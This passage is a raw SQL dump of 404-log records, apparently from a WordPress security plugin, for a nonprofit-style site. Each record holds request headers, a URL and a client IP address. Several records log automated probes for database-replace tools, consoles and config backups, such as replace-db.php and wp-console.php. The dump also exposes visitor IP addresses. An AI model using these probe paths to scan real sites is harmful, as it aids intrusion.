00:24:25',72708216,72791952,'http://zphiblgz.org/scholarship/application/',1,0,'46.161.11.21'),(96995,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"50\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631416073.1758420467376708984375;s:12:\"REQUEST_TIME\";i:1631416073;}}','notice','2021-09-12 03:07:55','2021-09-12 03:07:53',72707496,72808304,'https://zphiblgz.org/language/en-GB/en-GB.localise.php',1,0,'185.191.34.215'),(97050,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631577860.0065250396728515625;s:12:\"REQUEST_TIME\";i:1631577860;}}','notice','2021-09-14 00:04:22','2021-09-14 00:04:20',72734808,72818544,'http://zphiblgz.org/scholarship/application/',1,0,'45.150.112.82'),(97049,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:45:\"https://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631568032.339582920074462890625;s:12:\"REQUEST_TIME\";i:1631568032;}}','notice','2021-09-13 21:20:34','2021-09-13 21:20:32',72613224,72696208,'https://zphiblgz.org/scholarship/application/',1,0,'46.161.11.41'),(97048,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:45:\"https://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:102:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631568032.5162639617919921875;s:12:\"REQUEST_TIME\";i:1631568032;}}','notice','2021-09-13 21:20:34','2021-09-13 21:20:32',72320224,72403208,'https://zphiblgz.org/scholarship/application/',1,0,'46.161.11.41'),(97047,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:45:\"https://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631568032.2487370967864990234375;s:12:\"REQUEST_TIME\";i:1631568032;}}','notice','2021-09-13 21:20:33','2021-09-13 21:20:32',72320256,72403240,'https://zphiblgz.org/scholarship/application/',1,0,'46.161.11.41'),(97046,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:148:\"Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2_1 like Mac OS X; en-gb) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631566935.79216098785400390625;s:12:\"REQUEST_TIME\";i:1631566935;}}','notice','2021-09-13 21:02:17','2021-09-13 21:02:16',72605080,72688840,'http://zphiblgz.org/replace-db.php',1,0,'185.31.175.247'),(97024,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631494298.5088160037994384765625;s:12:\"REQUEST_TIME\";i:1631494298;}}','notice','2021-09-13 00:51:40','2021-09-13 00:51:38',72176608,72275904,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'207.46.13.142'),(97023,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.34 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631492150.7208120822906494140625;s:12:\"REQUEST_TIME\";i:1631492150;}}','notice','2021-09-13 00:15:53','2021-09-13 00:15:50',72691480,72775216,'http://zphiblgz.org/scholarship/application/',1,0,'195.246.120.164'),(97022,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"27\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631489037.60727596282958984375;s:12:\"REQUEST_TIME\";i:1631489037;}}','notice','2021-09-12 23:23:59','2021-09-12 23:23:57',72670896,72755472,'https://zphiblgz.org/configurationbak.php',1,0,'185.191.34.215'),(97021,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:130:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631485150.4079220294952392578125;s:12:\"REQUEST_TIME\";i:1631485150;}}','notice','2021-09-12 22:19:12','2021-09-12 22:19:10',72623072,72706808,'http://zphiblgz.org/scholarship/application/',1,0,'154.13.1.177'),(97020,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631483782.7679479122161865234375;s:12:\"REQUEST_TIME\";i:1631483782;}}','notice','2021-09-12 21:56:24','2021-09-12 21:56:23',72604936,72688672,'http://zphiblgz.org/scholarship/application/',1,0,'31.170.169.26'),(97019,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:1:\"5\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631478853.70191097259521484375;s:12:\"REQUEST_TIME\";i:1631478853;}}','notice','2021-09-12 20:34:15','2021-09-12 20:34:13',72627816,72712448,'https://zphiblgz.org/wp-console.php',1,0,'185.191.34.215'),(97018,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:101:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631473355.53092288970947265625;s:12:\"REQUEST_TIME\";i:1631473355;}}','notice','2021-09-12 19:02:39','2021-09-12 19:02:36',72691448,72775184,'http://zphiblgz.org/scholarship/application/',1,0,'107.150.38.218'),(97017,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:130:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631468981.9589240550994873046875;s:12:\"REQUEST_TIME\";i:1631468981;}}','notice','2021-09-12 17:49:43','2021-09-12 17:49:42',72604936,72688672,'http://zphiblgz.org/scholarship/application/',1,0,'92.118.77.10'),(97016,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631468886.6155719757080078125;s:12:\"REQUEST_TIME\";i:1631468886;}}','notice','2021-09-12 17:48:08','2021-09-12 17:48:06',72616872,72704136,'https://zphiblgz.org/event/youth-open-house/',1,0,'52.203.203.16'),(97015,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:22:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:135:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:27:\"https://zphiblgz.org/youth/\";s:14:\"HTTP_SEC_CH_UA\";s:76:\"\\\"Chromium\\\";v=\\\"92\\\", \\\" Not A;Brand\\\";v=\\\"99\\\", \\\"Google Chrome\\\";v=\\\"92\\\"\";s:21:\"HTTP_SEC_CH_UA_MOBILE\";s:2:\"?0\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631468544.1750431060791015625;s:12:\"REQUEST_TIME\";i:1631468544;}}','notice','2021-09-12 17:42:26','2021-09-12 17:42:24',72638488,72725216,'https://zphiblgz.org/event/youth-open-house/',1,0,'162.89.0.59'),(97014,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:24:\"HTTP_AMP_CACHE_TRANSFORM\";s:17:\"google;v=\\\"1..8\\\"\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:199:\"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631464233.52583408355712890625;s:12:\"REQUEST_TIME\";i:1631464233;}}','notice','2021-09-12 16:30:34','2021-09-12 16:30:33',71842760,71926520,'http://zphiblgz.org/n_top/tvcm.html',1,0,'66.249.65.101'),(97013,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631448873.6785199642181396484375;s:12:\"REQUEST_TIME\";i:1631448873;}}','notice','2021-09-12 12:14:35','2021-09-12 12:14:33',72148024,72231264,'https://zphiblgz.org/event/5th-annual-denim-pearlz-party/',1,0,'66.249.65.116'),(97012,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4086.0 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631445997.0349829196929931640625;s:12:\"REQUEST_TIME\";i:1631445997;}}','notice','2021-09-12 11:26:39','2021-09-12 11:26:37',72604936,72688672,'http://zphiblgz.org/scholarship/application/',1,0,'161.117.10.46'),(97011,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:139:\"Mozilla/5.0 (Linux; Android 4.1.2; SGH-I727R Build/JZO54K) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.169 Mobile Safari/537.22\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631443657.4980599880218505859375;s:12:\"REQUEST_TIME\";i:1631443657;}}','notice','2021-09-12 10:47:39','2021-09-12 10:47:37',72605608,72689456,'http://zphiblgz.org/SR-DB/',1,0,'45.153.160.131'),(97009,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:139:\"Mozilla/5.0 (Linux; Android 4.1.2; SGH-I727R Build/JZO54K) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.169 Mobile Safari/537.22\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631443644.7409489154815673828125;s:12:\"REQUEST_TIME\";i:1631443644;}}','notice','2021-09-12 10:47:25','2021-09-12 10:47:24',72312776,72396640,'http://zphiblgz.org/searchdb2.php',1,0,'185.220.102.249'),(97010,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:139:\"Mozilla/5.0 (Linux; Android 4.1.2; SGH-I727R Build/JZO54K) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.169 Mobile Safari/537.22\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631443647.02989101409912109375;s:12:\"REQUEST_TIME\";i:1631443647;}}','notice','2021-09-12 10:47:28','2021-09-12 10:47:27',72605744,72689608,'http://zphiblgz.org/replacedb2.php',1,0,'45.153.160.131'),(97008,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:139:\"Mozilla/5.0 (Linux; Android 4.1.2; SGH-I727R Build/JZO54K) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.169 Mobile 